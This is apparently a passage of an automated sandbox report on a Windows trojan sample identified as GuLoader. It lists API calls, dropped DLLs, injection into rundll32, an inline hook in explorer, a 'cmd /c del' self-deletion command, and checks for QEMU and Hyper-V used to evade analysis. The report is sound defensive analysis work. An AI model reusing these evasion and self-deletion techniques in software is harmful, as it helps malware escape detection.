Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782FB0 NtSetValueKey, 7_2_1D782FB0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782E00 NtQueueApcThread, 7_2_1D782E00
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782EC0 NtQuerySection, 7_2_1D782EC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782E80 NtCreateProcessEx, 7_2_1D782E80
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7829D0 NtWaitForSingleObject, 7_2_1D7829D0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782B20 NtQueryInformationProcess, 7_2_1D782B20
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782B00 NtQueryValueKey, 7_2_1D782B00
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782BE0 NtQueryVirtualMemory, 7_2_1D782BE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782B80 NtCreateKey, 7_2_1D782B80
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782A10 NtWriteFile, 7_2_1D782A10
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782AC0 NtEnumerateValueKey, 7_2_1D782AC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D782AA0 NtQueryInformationFile, 7_2_1D782AA0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D784570 NtSuspendThread, 7_2_1D784570
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D784260 NtSetContextThread, 7_2_1D784260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2C30 NtMapViewOfSection,LdrInitializeThunk, 14_2_046A2C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2CF0 NtDelayExecution,LdrInitializeThunk, 14_2_046A2CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2D10 NtQuerySystemInformation,LdrInitializeThunk, 14_2_046A2D10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_046A2DC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2E50 NtCreateSection,LdrInitializeThunk, 14_2_046A2E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2F00 NtCreateFile,LdrInitializeThunk, 14_2_046A2F00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A29F0 NtReadFile,LdrInitializeThunk, 14_2_046A29F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2A80 NtClose,LdrInitializeThunk, 14_2_046A2A80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2B00 NtQueryValueKey,LdrInitializeThunk, 14_2_046A2B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2B10 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_046A2B10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2BC0 NtQueryInformationToken,LdrInitializeThunk, 14_2_046A2BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2B80 NtCreateKey,LdrInitializeThunk, 14_2_046A2B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2B90 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_046A2B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A34E0 NtCreateMutant,LdrInitializeThunk, 14_2_046A34E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A4570 NtSuspendThread, 14_2_046A4570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A4260 NtSetContextThread, 14_2_046A4260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2C50 NtUnmapViewOfSection, 14_2_046A2C50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2C20 NtSetInformationFile, 14_2_046A2C20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2C10 NtOpenProcess, 14_2_046A2C10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2CD0 NtEnumerateKey, 14_2_046A2CD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2D50 NtWriteVirtualMemory, 14_2_046A2D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2DA0 NtReadVirtualMemory, 14_2_046A2DA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2E00 NtQueueApcThread, 14_2_046A2E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2EC0 NtQuerySection, 14_2_046A2EC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2ED0 NtResumeThread, 14_2_046A2ED0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2EB0 NtProtectVirtualMemory, 14_2_046A2EB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2E80 NtCreateProcessEx, 14_2_046A2E80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2F30 NtOpenDirectoryObject, 14_2_046A2F30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2FB0 NtSetValueKey, 14_2_046A2FB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A29D0 NtWaitForSingleObject, 14_2_046A29D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2A10 NtWriteFile, 14_2_046A2A10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2AC0 NtEnumerateValueKey, 14_2_046A2AC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2AA0 NtQueryInformationFile, 14_2_046A2AA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2B20 NtQueryInformationProcess, 14_2_046A2B20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A2BE0 NtQueryVirtualMemory, 14_2_046A2BE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A3C30 NtOpenProcessToken, 14_2_046A3C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A3C90 NtOpenThread, 14_2_046A3C90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046A38D0 NtGetContextThread, 14_2_046A38D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054A350 NtCreateFile, 14_2_0054A350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054A400 NtReadFile, 14_2_0054A400
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054A480 NtClose, 14_2_0054A480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054A530 NtAllocateVirtualMemory, 14_2_0054A530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054A3FA NtReadFile, 14_2_0054A3FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054A47A NtClose, 14_2_0054A47A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054A52A NtAllocateVirtualMemory, 14_2_0054A52A
Sample file is different than original file name gathered from version info
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamewxbase30u_xml_gcc_custom.dll4 vs aSsc9zh1ex.exe
Source: aSsc9zh1ex.exe, 00000007.00000002.42241457074.000000000012C000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs aSsc9zh1ex.exe
Source: aSsc9zh1ex.exe, 00000007.00000003.42237840723.0000000001B3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs aSsc9zh1ex.exe
Source: aSsc9zh1ex.exe, 00000007.00000003.42236234869.0000000001B3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs aSsc9zh1ex.exe
Source: aSsc9zh1ex.exe, 00000007.00000003.41891750806.000000001D4CE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs aSsc9zh1ex.exe
Source: aSsc9zh1ex.exe, 00000007.00000003.41897036006.000000001D68A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs aSsc9zh1ex.exe
Source: aSsc9zh1ex.exe, 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs aSsc9zh1ex.exe
Source: aSsc9zh1ex.exe, 00000007.00000002.42271876299.000000001D9E0000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs aSsc9zh1ex.exe
Source: aSsc9zh1ex.exe, 00000007.00000003.42235969161.0000000001B24000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs aSsc9zh1ex.exe
PE file contains strange resources
Source: aSsc9zh1ex.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Section loaded: edgegdi.dll Jump to behavior
PE file contains more sections than normal
Source: wxbase30u_xml_gcc_custom.dll.1.dr Static PE information: Number of sections : 12 > 10
Source: aSsc9zh1ex.exe Virustotal: Detection: 37%
Source: aSsc9zh1ex.exe Metadefender: Detection: 14%
Source: aSsc9zh1ex.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe File read: C:\Users\user\Desktop\aSsc9zh1ex.exe Jump to behavior
Source: aSsc9zh1ex.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\aSsc9zh1ex.exe "C:\Users\user\Desktop\aSsc9zh1ex.exe"
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Process created: C:\Users\user\Desktop\aSsc9zh1ex.exe "C:\Users\user\Desktop\aSsc9zh1ex.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\aSsc9zh1ex.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Process created: C:\Users\user\Desktop\aSsc9zh1ex.exe "C:\Users\user\Desktop\aSsc9zh1ex.exe" Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\aSsc9zh1ex.exe" Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_0040350A
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe File created: C:\Users\user\AppData\Local\Temp\nsi8952.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/8@29/7
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_004021AA CoCreateInstance, 1_2_004021AA
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_00404967
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:304:WilStaging_02
Source: aSsc9zh1ex.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.1.dr
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.1.dr
Source: Binary string: mshtml.pdb source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: aSsc9zh1ex.exe, 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41895267490.000000001D55D000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41890350295.000000001D3AB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42246206237.0000000004483000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42240222700.00000000042D2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aSsc9zh1ex.exe, aSsc9zh1ex.exe, 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41895267490.000000001D55D000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41890350295.000000001D3AB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42246206237.0000000004483000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42240222700.00000000042D2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: aSsc9zh1ex.exe, 00000007.00000003.42237635887.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42241289508.0000000000120000.00000040.10000000.00040000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.42235969161.0000000001B24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: aSsc9zh1ex.exe, 00000007.00000003.42237635887.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42241289508.0000000000120000.00000040.10000000.00040000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.42235969161.0000000001B24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000007.00000000.41769049306.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.41964484846.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_6F0030C0 push eax; ret 1_2_6F0030EE
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7408CD push ecx; mov dword ptr [esp], ecx 7_2_1D7408D6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046608CD push ecx; mov dword ptr [esp], ecx 14_2_046608D6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0053E287 push B364374Eh; iretd 14_2_0053E2E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054D4F2 push eax; ret 14_2_0054D4F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054D4FB push eax; ret 14_2_0054D562
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054D4A5 push eax; ret 14_2_0054D4F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054D55C push eax; ret 14_2_0054D562
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054681F push esp; ret 14_2_00546834
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0054E90F push esp; ret 14_2_0054E916
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00546AEE push esi; ret 14_2_00546AEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00547B37 push cs; ret 14_2_00547B39
PE file contains sections with non-standard names
Source: wxbase30u_xml_gcc_custom.dll.1.dr Static PE information: section name: .xdata
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_6F001BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_6F001BFF
Drops PE files
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe File created: C:\Users\user\AppData\Local\Temp\nso8B47.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe File created: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll Jump to dropped file
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe File created: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll Jump to dropped file
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe File created: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xED
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\rundll32.exe Process created: /c del "C:\Users\user\Desktop\aSsc9zh1ex.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: /c del "C:\Users\user\Desktop\aSsc9zh1ex.exe" Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: aSsc9zh1ex.exe, 00000001.00000002.41964793093.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
Source: aSsc9zh1ex.exe, 00000001.00000002.41964793093.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6284 Thread sleep count: 187 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6284 Thread sleep time: -374000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll Jump to dropped file
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll Jump to dropped file
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77FD40 rdtsc 7_2_1D77FD40
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe API coverage: 1.0 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 2.0 %
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_00406850 FindFirstFileW,FindClose, 1_2_00406850
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405C26
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe API call chain: ExitProcess graph end node
Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: explorer.exe, 0000000A.00000000.42204571289.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41938326898.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42003368146.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42072237105.0000000011F87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWEXE
Source: aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: aSsc9zh1ex.exe, 00000007.00000003.42236774910.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41892637526.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243111671.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41893076599.0000000001B14000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWLr^
Source: aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: aSsc9zh1ex.exe, 00000007.00000003.42236774910.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41892637526.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243111671.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242706672.0000000001AE4000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41893076599.0000000001B14000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.42236379265.0000000001AE3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41938326898.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42003368146.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42004108195.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41939086451.0000000012015000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: aSsc9zh1ex.exe, 00000001.00000002.41964793093.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: explorer.exe, 0000000A.00000000.42204571289.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41938326898.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42003368146.0000000011F87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42072237105.0000000011F87000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWndow ClasssApps\Microsoft.Windows.Photos_2021.21070.22007.0_x64__8wekyb3d8bbwe\Assets\PhotosLogoExtensions.targetsize-48.png
Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
